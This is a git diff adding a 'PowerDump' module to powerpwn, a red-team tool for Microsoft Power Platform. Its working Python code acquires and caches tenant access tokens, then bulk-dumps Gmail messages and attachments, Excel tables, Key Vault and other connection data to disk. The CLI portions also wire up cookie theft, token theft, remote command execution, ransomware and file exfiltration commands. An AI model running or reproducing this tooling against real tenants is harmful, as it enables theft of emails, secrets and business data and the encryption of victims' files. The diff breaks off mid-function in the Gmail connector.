diff --git a/docs/powerdump/README.md b/docs/powerdump/README.md new file mode 100644 index 0000000..c9e7420 --- /dev/null +++ b/docs/powerdump/README.md @@ -0,0 +1,49 @@ +# PowerDump + + +powerdump is a tool for exploring information in Microsoft PowerPlatform from a Red Team perspective. In short, this is what it does: +* Generates access tokens to fetch available resources in Microsoft PowerApps. +* Uses HTTP calls in Python to dump all available information in the Microsoft PowerPlatform to a local directory. +* Generates access tokens to perform advanced actions on discovered resources. +* Provides a basic GUI to present collected resources and data. + +powerpwn uses the `browsepy` Python library and is only compatible with Python 3.6-3.8 (development is done with Python 3.8). + +### Installation +**Using a version from GitHub** + +Clone the repository and run: + +``` +pip install . +``` + +### Installation for development +Clone the repository and set up a virtual environment in your IDE. Install Python packages by running: + +``` +python init_repo.py + +``` +To activate the virtual environment (.venv) run: +``` +.\.venv\Scripts\activate (Windows) + +source ./.venv/bin/activate (Linux) + +``` + +### Using powerpwn +**Explore using the CLI** +* Run `powerpwn dump --tenant {tenantId} --cache-path {path}` to collect data from the tenant `tenantId` and store it under `path`. The default cache-path is `.cache`. +* For more options, run `powerpwn dump --help`. +* On the first run, a device flow will be initiated to acquire an access token. +* This may take a while, depending on the tenant size. Once collection is done, you can find the collected resources and data under the `path` directory. +* Access tokens for powerapps and apihub are cached in the `tokens.json` file. +* To run a local server for the GUI, run the dump command with `-g` or `--gui` (see the end-to-end example below). + +**Using the GUI** +* Run `powerpwn gui --cache-path {path}` with the same cache-path used for the `dump` command. The default cache-path is `.cache`. +* On http://127.0.0.1:5000/ you can find an application with all collected resources. +* For connections, the Playground will generate the connection's swagger, which allows you to run these connections and perform actions on the platform. To authenticate, use the apihub access token generated in the previous step. +* On http://127.0.0.1:8080/ you can find a simple file browser over all dumped resources and data.
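+
+### Example: end-to-end dump
+
+A minimal example session might look like the following (the tenant id is a placeholder for your target tenant):
+
+```
+powerpwn dump --tenant <tenant-id> --cache-path .cache --gui
+```
+
+This collects all available resources and data into `.cache` and then serves the GUI on http://127.0.0.1:5000/ and the file browser on http://127.0.0.1:8080/. To browse an existing cache later without collecting again, run `powerpwn gui --cache-path .cache`.
+
+**Calling the collectors from Python**
+
+The `dump` command is a thin wrapper around the collector classes. The sketch below mirrors what `src/powerpwn/cli.py` does internally; the module paths and class names are taken from this package, but the internal API is not stable and may change:
+
+```
+from powerpwn.powerdump.collect.data_collectors.data_collector import DataCollector
+from powerpwn.powerdump.collect.resources_collectors.resources_collector import ResourcesCollector
+from powerpwn.powerdump.utils.auth import acquire_token
+from powerpwn.powerdump.utils.const import API_HUB_SCOPE, POWER_APPS_SCOPE
+
+cache_path = ".cache"
+tenant = "<tenant-id>"  # placeholder
+
+# Phase 1: list available resources (apps, connections, ...) with a Power Apps token
+token = acquire_token(scope=POWER_APPS_SCOPE, tenant=tenant)
+ResourcesCollector(token=token, cache_path=cache_path).collect_and_cache()
+
+# Phase 2: dump data from the discovered connections with an API hub token
+token = acquire_token(scope=API_HUB_SCOPE, tenant=tenant)
+DataCollector(token=token, cache_path=cache_path).collect()
+```
+
+As with the CLI, acquiring a token starts a device flow on the first run.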
diff --git a/init_repo.py b/init_repo.py index 809c1d3..7744f8d 100644 --- a/init_repo.py +++ b/init_repo.py @@ -3,11 +3,11 @@ import sys -def log(message: str): +def log(message: str) -> None: print(f"[init_repo] {message}") -def check_python_version(): +def check_python_version() -> bool: version_info = sys.version_info if version_info.major != 3: return False @@ -17,28 +17,29 @@ def check_python_version(): return True -if check_python_version(): - log("Setting python path") - # set pythonpath - sys.path.append("./src") +def main() -> None: + if check_python_version(): + log("Creating virtual environment") + subprocess.run("python -m venv .venv") # nosec - log("Creating virtual environment") - subprocess.run("python -m venv .venv") # nosec + log("Installing python packages") + py_path = os.path.join(".venv", "Scripts", "python") - log("Installing python packages") - py_path = os.path.join(".venv", "Scripts", "python") + if not sys.platform.startswith("win"): + py_path = os.path.join(".venv", "bin", "python") - if not sys.platform.startswith("win"): - py_path = os.path.join(".venv", "bin", "python") + subprocess.run(f"{py_path} -m pip install --upgrade pip", shell=True) # nosec - subprocess.run(f"{py_path} -m pip install --upgrade pip", shell=True) # nosec + # install packages + subprocess.run(f"{py_path} -m pip install -r requirements.txt", shell=True) # nosec - # install packages - subprocess.run(f"{py_path} -m pip install -r requirements.txt", shell=True) # nosec + log("Python packages installed successfully") - log("Python packages installed successfully") + log("DONE!") - log("DONE!") + else: + log("Supported python versions are 3.6-3.8") -else: - log("Supported python versions are 3.6-3.8") + +if __name__ == "__main__": + main() diff --git a/readme.md b/readme.md index d4c5048..a6066b5 100644 --- a/readme.md +++ b/readme.md @@ -13,4 +13,6 @@ Disclaimer: these materials are presented from an attacker’s perspective with [LCNC Malware](docs/machinepwn/machine_pwn.md) +[PowerDump](docs/powerdump/README.md) + [PowerDoor](docs/powerdoor/readme.md) diff --git a/setup.cfg b/setup.cfg index 7d1e2a4..3ae03ee 100644 --- a/setup.cfg +++ b/setup.cfg @@ -24,9 +24,9 @@ install_requires = art typing_extensions<4.6.0 -packages = find: package_dir = = src +packages = find: [options.packages.find] where = src diff --git a/src/powerpwn/cli.py b/src/powerpwn/cli.py index f7660b0..709381f 100644 --- a/src/powerpwn/cli.py +++ b/src/powerpwn/cli.py @@ -1,6 +1,8 @@ import argparse import json import logging +import os +import shutil from art import tprint @@ -10,71 +12,95 @@ from powerpwn.machinepwn.machine_pwn import MachinePwn from powerpwn.powerdoor.backdoor_flow import BackdoorFlow from powerpwn.powerdoor.enums.action_type import ActionType +from powerpwn.powerdump.collect.data_collectors.data_collector import DataCollector +from powerpwn.powerdump.collect.resources_collectors.resources_collector import ResourcesCollector +from powerpwn.powerdump.gui.gui import Gui +from powerpwn.powerdump.utils.auth import acquire_token, acquire_token_from_cached_refresh_token +from powerpwn.powerdump.utils.const import API_HUB_SCOPE, CACHE_PATH, POWER_APPS_SCOPE logger = logging.getLogger(LOGGER_NAME) -def register_machine_pwn_common_args(sub_parser: argparse.ArgumentParser): +def register_gui_parser(sub_parser: argparse.ArgumentParser) -> None: + gui_parser = sub_parser.add_parser("gui", description="Show collected resources and data.", help="Show collected resources and data via GUI.") # type: ignore[attr-defined] + 
gui_parser.add_argument("-l", "--log-level", default=logging.INFO, type=lambda x: getattr(logging, x), help="Configure the logging level.") + gui_parser.add_argument("--cache-path", default=CACHE_PATH, type=str, help="Path to cached resources.") + + +def register_collect_parser(sub_parser: argparse.ArgumentParser) -> None: + explore_parser = sub_parser.add_parser( # type: ignore[attr-defined] + "dump", description="Collect all available data in tenant", help="Get all available resources in tenant and dump data." + ) + explore_parser.add_argument("-l", "--log-level", default=logging.INFO, type=lambda x: getattr(logging, x), help="Configure the logging level.") + explore_parser.add_argument("-c", "--clear-cache", action="store_true", help="Clear local disk cache") + explore_parser.add_argument("--cache-path", default=CACHE_PATH, help="Path to store collected resources and data.") + explore_parser.add_argument("-t", "--tenant", required=False, type=str, help="Tenant id to connect.") + explore_parser.add_argument("-g", "--gui", action="store_true", help="Run local server for gui.") + + +def register_machine_pwn_common_args(sub_parser: argparse.ArgumentParser) -> None: sub_parser.add_argument("-w", "--webhook-url", required=True, type=str, help="Webhook url to the flow factory installed in powerplatform") sub_parser.add_argument("-l", "--log-level", default=logging.INFO, type=lambda x: getattr(logging, x), help="Configure the logging level.") -def register_backdoor_flow_common_args(sub_parser: argparse.ArgumentParser): +def register_backdoor_flow_common_args(sub_parser: argparse.ArgumentParser) -> None: sub_parser.add_argument("-w", "--webhook-url", required=True, type=str, help="Webhook url to the flow factory installed in powerplatform") sub_parser.add_argument("-l", "--log-level", default=logging.INFO, type=lambda x: getattr(logging, x), help="Configure the logging level.") sub_parser.add_argument("-e", "--environment-id", required=True, type=str, help="Environment id in powerplatform.") -def register_exec_parsers(command_subparsers: argparse.ArgumentParser): - steal_fqdn_parser = command_subparsers.add_parser("steal-cookie", description="Steal cookie of fqdn") +def register_exec_parsers(command_subparsers: argparse.ArgumentParser) -> None: + steal_fqdn_parser = command_subparsers.add_parser("steal-cookie", description="Steal cookie of fqdn") # type: ignore[attr-defined] register_steal_fqdn_cookie_parser(steal_fqdn_parser) - steal_power_automate_token_parser = command_subparsers.add_parser("steal-power-automate-token", description="Steal power automate token") + steal_power_automate_token_parser = command_subparsers.add_parser("steal-power-automate-token", description="Steal power automate token") # type: ignore[attr-defined] register_machine_pwn_common_args(steal_power_automate_token_parser) - execute_command_parser = command_subparsers.add_parser("command-exec", description="Execute command on machine") + execute_command_parser = command_subparsers.add_parser("command-exec", description="Execute command on machine") # type: ignore[attr-defined] register_exec_command_parser(execute_command_parser) - ransomware_parser = command_subparsers.add_parser("ransomware", description="Ransomware") + ransomware_parser = command_subparsers.add_parser("ransomware", description="Ransomware") # type: ignore[attr-defined] register_ransomware_parser(ransomware_parser) - exflirtate_file_parser = command_subparsers.add_parser("exflirtate", description="Exflirtate file") + exflirtate_file_parser = 
command_subparsers.add_parser("exflirtate", description="Exflirtate file") # type: ignore[attr-defined] register_exflirtate_file_parser(exflirtate_file_parser) - cleanup_parser = command_subparsers.add_parser("cleanup", description="Cleanup") + cleanup_parser = command_subparsers.add_parser("cleanup", description="Cleanup") # type: ignore[attr-defined] register_machine_pwn_common_args(cleanup_parser) ## machine pwn parsers ## -def register_steal_fqdn_cookie_parser(sub_parser: argparse.ArgumentParser): +def register_steal_fqdn_cookie_parser(sub_parser: argparse.ArgumentParser) -> None: register_machine_pwn_common_args(sub_parser) sub_parser.add_argument("-fqdn", "--cookie", required=True, type=str, help="Fully qualified domain name to fetch the cookies of") -def register_exec_command_parser(sub_parser: argparse.ArgumentParser): +def register_exec_command_parser(sub_parser: argparse.ArgumentParser) -> None: register_machine_pwn_common_args(sub_parser) sub_parser.add_argument("-t", "--type", required=True, type=str, choices=[cmd_type.value for cmd_type in CodeExecTypeEnum], help="Command type") sub_parser.add_argument("-c", "--command-to-execute", required=True, type=str, help="Command to execute") -def register_ransomware_parser(sub_parser: argparse.ArgumentParser): +def register_ransomware_parser(sub_parser: argparse.ArgumentParser) -> None: register_machine_pwn_common_args(sub_parser) sub_parser.add_argument("--crawl_depth", required=True, type=str, help="Recursively search into subdirectories this many times") sub_parser.add_argument("-k", "--encryption-key", required=True, type=str, help="an encryption key used to encrypt each file identified (AES256)") sub_parser.add_argument( - "--dirs", required=True, type=str, help="A list of directories to begin crawl from separated by a command (e.g.'C:\\,D:\\')" + "--dirs", required=True, type=str, help="A list of directories to begin crawl from separated by a comma (e.g.'C:\\,D:\\')" ) -def register_exflirtate_file_parser(sub_parser: argparse.ArgumentParser): +def register_exflirtate_file_parser(sub_parser: argparse.ArgumentParser) -> None: register_machine_pwn_common_args(sub_parser) sub_parser.add_argument("-f", "--file", required=True, type=str, help="Absolute path to file") -def parse_arguments(): +def parse_arguments() -> argparse.Namespace: parser = argparse.ArgumentParser() parser.add_argument("-l", "--log-level", default=logging.INFO, type=lambda x: getattr(logging, x), help="Configure the logging level.") command_subparsers = parser.add_subparsers(help="command", dest="command") + register_collect_parser(command_subparsers) # type: ignore[arg-type] + register_gui_parser(command_subparsers) # type: ignore[arg-type] ## Delete Flow parser ## delete_flow_parser = command_subparsers.add_parser("delete-flow", description="Deletes flow.", help="Deletes flow using installed backdoor flow.") @@ -95,13 +121,45 @@ def parse_arguments(): register_backdoor_flow_common_args(get_connections_parser) get_connections_parser.add_argument("-o", "--output", type=str, default="", help="Path to output file.") - register_exec_parsers(command_subparsers) + register_exec_parsers(command_subparsers) # type: ignore[arg-type] args = parser.parse_args() return args -def run_backdoor_flow_command(args): +def __init_command_token(args: argparse.Namespace, scope: str) -> str: + # if cached refresh token is found, use it + if token := acquire_token_from_cached_refresh_token(scope, args.tenant): + return token + + return acquire_token(scope=scope, tenant=args.tenant) + + 
+def run_collect_resources_command(args: argparse.Namespace) -> None: + # cache + if args.clear_cache: + try: + shutil.rmtree(args.cache_path) + except FileNotFoundError: + pass + os.makedirs(args.cache_path, exist_ok=True) + + token = __init_command_token(args, POWER_APPS_SCOPE) + + entities_fetcher = ResourcesCollector(token=token, cache_path=args.cache_path) + entities_fetcher.collect_and_cache() + + +def run_gui_command(args: argparse.Namespace) -> None: + Gui().run(cache_path=args.cache_path) + + +def run_collect_data_command(args: argparse.Namespace) -> None: + token = __init_command_token(args, API_HUB_SCOPE) + DataCollector(token=token, cache_path=args.cache_path).collect() + + +def run_backdoor_flow_command(args: argparse.Namespace) -> None: action_type = ActionType(args.command) backdoor_flow = BackdoorFlow(args.webhook_url) if action_type == ActionType.delete_flow: @@ -120,7 +178,7 @@ def run_backdoor_flow_command(args): logger.info(connections) -def run_machine_pwn_command(args): +def run_machine_pwn_command(args: argparse.Namespace) -> None: command_type = CommandToRunEnum(args.command) machine_pwn = MachinePwn(args.webhook_url) if command_type == CommandToRunEnum.CLEANUP: @@ -130,7 +188,7 @@ def run_machine_pwn_command(args): elif command_type == CommandToRunEnum.EXFILTRATION: res = machine_pwn.exfiltrate(args.file) elif command_type == CommandToRunEnum.RANSOMWARE: - res = machine_pwn.ransomware(args.crawl_depth, args.dirs, args.encryption_key) + res = machine_pwn.ransomware(args.crawl_depth, args.dirs.split(","), args.encryption_key) elif command_type == CommandToRunEnum.STEAL_COOKIE: res = machine_pwn.steal_cookie(args.cookie) elif command_type == CommandToRunEnum.STEAL_POWER_AUTOMATE_TOKEN: @@ -138,7 +196,7 @@ def run_machine_pwn_command(args): print(res) -def main(): +def main() -> None: print("\n\n------------------------------------------------------------") tprint("powerpwn") print("------------------------------------------------------------\n\n") @@ -149,7 +207,18 @@ def main(): logger.level = args.log_level command = args.command - if command in [action_type.value for action_type in ActionType]: + if command == "dump": + run_collect_resources_command(args) + run_collect_data_command(args) + logger.info(f"Dump is completed in {args.cache_path}") + if args.gui: + logger.info("Going to run local server for gui") + run_gui_command(args) + + elif command == "gui": + run_gui_command(args) + + elif command in [action_type.value for action_type in ActionType]: run_backdoor_flow_command(args) elif command in [cmd_type.value for cmd_type in CommandToRunEnum]: diff --git a/src/powerpwn/powerdump/__init__.py b/src/powerpwn/powerdump/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/src/powerpwn/powerdump/collect/__init__.py b/src/powerpwn/powerdump/collect/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/src/powerpwn/powerdump/collect/data_collectors/__init__.py b/src/powerpwn/powerdump/collect/data_collectors/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/__init__.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connections_data_collector.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connections_data_collector.py new file mode 100644 
index 0000000..b6532ca --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connections_data_collector.py @@ -0,0 +1,63 @@ +import base64 +import io +import os +from typing import List + +import PIL.Image as Image +import requests + +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors import API_NAME_TO_CONNECTOR_CLS +from powerpwn.powerdump.collect.data_collectors.enums.data_dump_source import DataDumpSource +from powerpwn.powerdump.collect.data_collectors.idata_collector import IDataCollector +from powerpwn.powerdump.collect.models.data_dump_entity import DataDumpWithContext +from powerpwn.powerdump.collect.models.data_store_entity import DataStoreWithContext +from powerpwn.powerdump.utils.model_loaders import get_connector, load_connections + + +class ConnectionsDataCollector(IDataCollector): + def __init__(self, cache_path: str) -> None: + self.__cache_path = cache_path + + def collect(self, session: requests.Session, env_id: str, output_dir_path: str) -> None: + data_dumps: List[DataDumpWithContext] = [] + connections_dumps_root_dir = os.path.join(output_dir_path, DataDumpSource.connections.value) + + for connection in load_connections(cache_path=self.__cache_path, env_id=env_id): + current_data_stores: List[DataStoreWithContext] = [] + connection_id = connection.connection_id + api_name = connection.api_name + + connections_apis_dir = os.path.join(connections_dumps_root_dir, connection.api_name) + if not connection.shareable: + continue + if api_name in API_NAME_TO_CONNECTOR_CLS: + connection_dump_root_dir = os.path.join(connections_apis_dir, connection.connection_id) + + connector_cls = API_NAME_TO_CONNECTOR_CLS[api_name] + spec = get_connector(self.__cache_path, connection.environment_id, connector_cls.api_name()) + + connector_cls_instance = connector_cls(session=session, spec=spec, connection_id=connection_id) + current_data_stores = connector_cls_instance.ping(connection_parameters=connection.connection_parameters) + + for data_store in current_data_stores: + data_records = connector_cls_instance.enum(data_store=data_store) + for data_record in data_records: + data_dump_type_dir = os.path.join(connection_dump_root_dir, data_record.data_record.record_type) + os.makedirs(data_dump_type_dir, exist_ok=True) + data_dump = connector_cls_instance.dump(data_record=data_record) + data_dump_path = os.path.join(data_dump_type_dir, f"{data_record.data_record.record_name}.{data_dump.data_dump.extension}") + encoding = data_dump.data_dump.encoding + extension = data_dump.data_dump.extension + content = data_dump.data_dump.content + if extension == "png": + self.__dump_png(content, data_dump_path) + else: + with open(data_dump_path, "w") as f: + content = content.decode(encoding) if encoding else content + f.write(content) + data_dumps.append(data_dump) + + def __dump_png(self, bytes: bytes, path: str) -> None: + image_bytes = base64.b64decode(bytes) + img = Image.open(io.BytesIO(image_bytes)) + img.save(path) diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/__init__.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/__init__.py new file mode 100644 index 0000000..becd45d --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/__init__.py @@ -0,0 +1,22 @@ +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.excelonlinebusiness import 
ExcelOnlineBusinessConnector +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.github import GitHubConnector +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.gmail import GmailConnector +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.keyvault import KeyVaultConnector +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.shared_azureblob import SharedAzureBlobConnector +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.shared_azurequeues import SharedAzureQueuesConnector +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.shared_azuretables import SharedAzureTablesConnector +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.shared_documentdb import SharedDocumentDBConnector +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.shared_sql import SharedSqlConnector + +CONNECTOR_CLS_SET = { + KeyVaultConnector, + GitHubConnector, + GmailConnector, + ExcelOnlineBusinessConnector, + SharedSqlConnector, + SharedDocumentDBConnector, + SharedAzureTablesConnector, + SharedAzureBlobConnector, + SharedAzureQueuesConnector, +} +API_NAME_TO_CONNECTOR_CLS = {connector_cls.api_name(): connector_cls for connector_cls in CONNECTOR_CLS_SET} diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/connector_base.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/connector_base.py new file mode 100644 index 0000000..915a720 --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/connector_base.py @@ -0,0 +1,71 @@ +import abc +from typing import List + +import requests + +from powerpwn.powerdump.collect.models.connector_entity import Connector +from powerpwn.powerdump.collect.models.data_dump_entity import DataDump, DataDumpWithContext +from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext +from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext + + +class ConnectorBase(abc.ABC): + def __init__(self, session: requests.Session, spec: Connector, connection_id: str): + self._session = session + self._environment_id = spec.environment_id + self._connection_id = connection_id + + host = spec.swagger["host"] + base_path = spec.swagger["basePath"] + self._root = f"https://{host}{base_path}/{connection_id}" + + def ping(self, connection_parameters: dict) -> List[DataStoreWithContext]: + """ + Test connection to api + + Args: + connection_parameters (dict): connection parameters to api + + Returns: + list[DataStoreWithContext]: list of data store entities to query + """ + return [ + DataStoreWithContext(api_name=self.api_name(), connection_id=self._connection_id, data_store=data_store) + for data_store in self._ping(connection_parameters=connection_parameters) + ] + + def _ping(self, connection_parameters: dict) -> List[DataStore]: + pass + + def enum(self, data_store: DataStoreWithContext) -> List[DataRecordWithContext]: + return [DataRecordWithContext(data_store=data_store, data_record=data_record) for data_record in self._enum(data_store=data_store)] + + def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]: + pass + + def dump(self, data_record: DataRecordWithContext) -> DataDumpWithContext: + """ 
+ Dump data + + Args: + data_record (DataRecordWithContext): data record details to dump + + Returns: + DataDumpWithContext: dump data + """ + return DataDumpWithContext(data_record=data_record, data_dump=self._dump(data_record=data_record)) + + def _dump(self, data_record: DataRecordWithContext) -> DataDump: + pass + + @classmethod + def api_name(cls) -> str: + pass + + @classmethod + def _apim_path(cls) -> str: + pass + + @classmethod + def uses_undocumented_api_properties(cls) -> bool: + return False diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/excelonlinebusiness.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/excelonlinebusiness.py new file mode 100644 index 0000000..7240285 --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/excelonlinebusiness.py @@ -0,0 +1,144 @@ +import json +from typing import Any, Dict, List + +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.connector_base import ConnectorBase +from powerpwn.powerdump.collect.data_collectors.enums.data_dump_type import DataDumpType +from powerpwn.powerdump.collect.models.data_dump_entity import DataDump +from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext +from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext +from powerpwn.powerdump.utils.const import ENCODING +from powerpwn.powerdump.utils.requests_wrapper import consecutive_gets, request_and_verify + + +class ExcelOnlineBusinessConnector(ConnectorBase): + def _ping(self, connection_parameters: Dict[str, Any]) -> List[DataStore]: + records: List[DataStore] = [] + + sources_success, sources_val = consecutive_gets( + session=self._session, expected_status_prefix="200", url=f"{self._root}/codeless/v1.0/sources" + ) + + if sources_success: + for source in sources_val: + source_id = source["id"] + + params = {"source": source_id} + drives_success, drives_val = consecutive_gets( + session=self._session, expected_status_prefix="200", url=f"{self._root}/codeless/v1.0/drives", params=params + ) + + if drives_success: + for drive in drives_val: + records.append( + DataStore( + tenant=None, + account=connection_parameters["accountName"], + scope=None, + host=drive["webUrl"], + name=drive["name"], + extra={"source": source, "drive": drive}, + ) + ) + + return records + + def __enum_dir(self, source_id: str, drive_id: str, folder_id: str) -> List[Dict[str, Any]]: + file_objs: List[Dict[str, Any]] = [] + + if folder_id == "root": + folder_path = "root" + else: + folder_path = f"items/{folder_id}" + + params = {"source": source_id} + can_list_folder, _, list_folder_val = request_and_verify( + session=self._session, + expected_status_prefix="200", + method="get", + url=f"{self._root}/codeless/v1.0/drives/{drive_id}/{folder_path}/children", + params=params, + ) + if can_list_folder: + if not isinstance(list_folder_val, list): + raise ValueError(f"Unexpected response list_folder_val: {list_folder_val}.") + + for file_or_dir_obj in list_folder_val: + if not isinstance(file_or_dir_obj, dict): + raise ValueError(f"Unexpected response file_or_dir_obj: {file_or_dir_obj}.") + if file_or_dir_obj["IsFolder"]: + file_objs += self.__enum_dir(source_id=source_id, drive_id=drive_id, folder_id=file_or_dir_obj["Id"]) + else: + file_objs += [file_or_dir_obj] + + return file_objs + + def _enum(self, data_store: DataStoreWithContext) -> 
List[DataRecord]: + data_records: List[DataRecord] = [] + + source_id = data_store.data_store.extra["source"]["id"] + drive_id = data_store.data_store.extra["drive"]["id"] + + drive_files = self.__enum_dir(source_id=source_id, drive_id=drive_id, folder_id="root") + + for file_obj in drive_files: + file_id = file_obj["Id"] + + params = {"source": source_id} + tables_success, tables_val = consecutive_gets( + session=self._session, + expected_status_prefix="200", + url=f"{self._root}/codeless/v1.0/drives/{drive_id}/items/{file_id}/workbook/tables", + params=params, + ) + + if tables_success: + for table_obj in tables_val: + table_id = table_obj["id"] + + data_records.append( + DataRecord( + record_type=DataDumpType.table, + record_id=table_id, + record_name=f"{file_obj['Path']}/{table_obj['name']}", + extra={"file": file_obj, "table": table_obj}, + ) + ) + + return data_records + + def _dump(self, data_record: DataRecordWithContext) -> DataDump: + if data_record.data_record.record_type == DataDumpType.table: + source_id = data_record.data_store.data_store.extra["source"]["id"] + drive_id = data_record.data_store.data_store.extra["drive"]["id"] + file_id = data_record.data_record.extra["file"]["Id"] + table_id = data_record.data_record.extra["table"]["id"] + + success, rows_val = consecutive_gets( + session=self._session, + expected_status_prefix="200", + url=f"{self._root}/drives/{drive_id}/files/{file_id}/tables/{table_id}/items", + params={"source": source_id}, + ) + if success: + extension = "json" + encoding = ENCODING + content = json.dumps(rows_val).encode(ENCODING) + + else: + raise ValueError(f"Unsupported data type: {data_record.data_record.record_type}.") + + if not success: + raise ValueError( + f"Unable to fetch value for data type: {data_record.data_record.record_type} with ID: {data_record.data_record.record_id}." 
+ ) + + data_dump = DataDump(extension=extension, encoding=encoding, content=content) + return data_dump + + @classmethod + def api_name(cls) -> str: + return "shared_excelonlinebusiness" + + @classmethod + def _apim_path(cls) -> str: + return "excelonlinebusiness" diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/github.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/github.py new file mode 100644 index 0000000..b8bdf5f --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/github.py @@ -0,0 +1,45 @@ +from typing import List + +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.connector_base import ConnectorBase +from powerpwn.powerdump.collect.models.data_dump_entity import DataDump +from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext +from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext +from powerpwn.powerdump.utils.requests_wrapper import request_and_verify + + +class GitHubConnector(ConnectorBase): + def _ping(self, connection_parameters: dict) -> List[DataStore]: + records: List[DataStore] = [] + + # while spec documents status_code 200 on success, 202 has been observed as well + success, head, val = request_and_verify( + session=self._session, expected_status_prefix="20", method="get", url=f"{self._root}/trigger/issueClosed" + ) + + if success: + records.append( + DataStore( + tenant=None, account=head["x-oauth-client-id"], scope=head["x-oauth-scopes"], host="https://api.github.com/", name=None, extra={} + ) + ) + + return records + + def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]: + raise NotImplementedError() + + def _dump(self, data_record: DataRecordWithContext) -> DataDump: + raise NotImplementedError() + + @classmethod + def api_name(cls) -> str: + return "shared_github" + + @classmethod + def _apim_path(cls) -> str: + return "github" + + @classmethod + def uses_undocumented_api_properties(cls) -> bool: + # headers returned from the API are not documented in the swagger + return True diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/gmail.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/gmail.py new file mode 100644 index 0000000..f46c050 --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/gmail.py @@ -0,0 +1,138 @@ +from typing import List, Set + +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.connector_base import ConnectorBase +from powerpwn.powerdump.collect.data_collectors.enums.data_dump_type import DataDumpType +from powerpwn.powerdump.collect.models.data_dump_entity import DataDump +from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext +from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext +from powerpwn.powerdump.utils.const import ENCODING +from powerpwn.powerdump.utils.requests_wrapper import request_and_verify + + +class GmailConnector(ConnectorBase): + def _ping(self, connection_parameters: dict) -> List[DataStore]: + success, _, _ = request_and_verify(session=self._session, expected_status_prefix="200", method="get", url=f"{self._root}/TestConnection") + + if success: + return [ + DataStore( + tenant=None, 
account=connection_parameters["accountName"], scope=None, host="https://gmail.googleapis.com/", name=None, extra={} + ) + ] + return [] + + def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]: + data_records: List[DataRecord] = [] + unique_email_ids_seen: Set[str] = set() + + can_list_labels, _, labels_val = request_and_verify( + session=self._session, expected_status_prefix="200", method="get", url=f"{self._root}/Mail/Labels" + ) + if can_list_labels: + # Iterate over parameters to enum as many emails as possible + for label_obj in labels_val: + for fetch_only_with_attachments in (True, False): + for importance in ("Important", "Not important"): + for starred in ("Starred", "Not starred"): + params = { + "label": label_obj["Id"], + "importance": importance, + "starred": starred, + "fetchOnlyWithAttachments": fetch_only_with_attachments, + "includeAttachments": True, + "subject": "", + } + + # Iterate over as many subjects as possible + get_email_success = True + while get_email_success: + get_email_success, _, get_email_val = request_and_verify( + session=self._session, + expected_status_prefix="200", + method="get", + url=f"{self._root}/Mail/LastReceived", + params=params, + ) + + if get_email_success: + if get_email_val.get("Id") not in unique_email_ids_seen: + data_records.append( + DataRecord( + record_type=DataDumpType.email, + record_id=get_email_val["Id"], + record_name=get_email_val["Subject"], + extra={k: v for k, v in get_email_val.items() if k not in {"Body", "Attachments"}}, + ) + ) + + for attachment_obj in get_email_val["Attachments"]: + data_records.append( + DataRecord( + record_type=DataDumpType.attachment, + record_id=get_email_val["Id"], + record_name=attachment_obj["Name"], + extra={k: v for k, v in attachment_obj.items() if k not in {"ContentBytes"}}, + ) + ) + + # avoid processing the same email twice + unique_email_ids_seen.add(get_email_val["Id"]) + + # Ignore identical subjects to continue iteration + params["subject"] += f" -{get_email_val['Subject']}" + + return data_records + + def _dump(self, data_record: DataRecordWithContext) -> DataDump: + if data_record.data_record.record_type == DataDumpType.email: + success, _, get_email_val = request_and_verify( + session=self._session, + expected_status_prefix="200", + 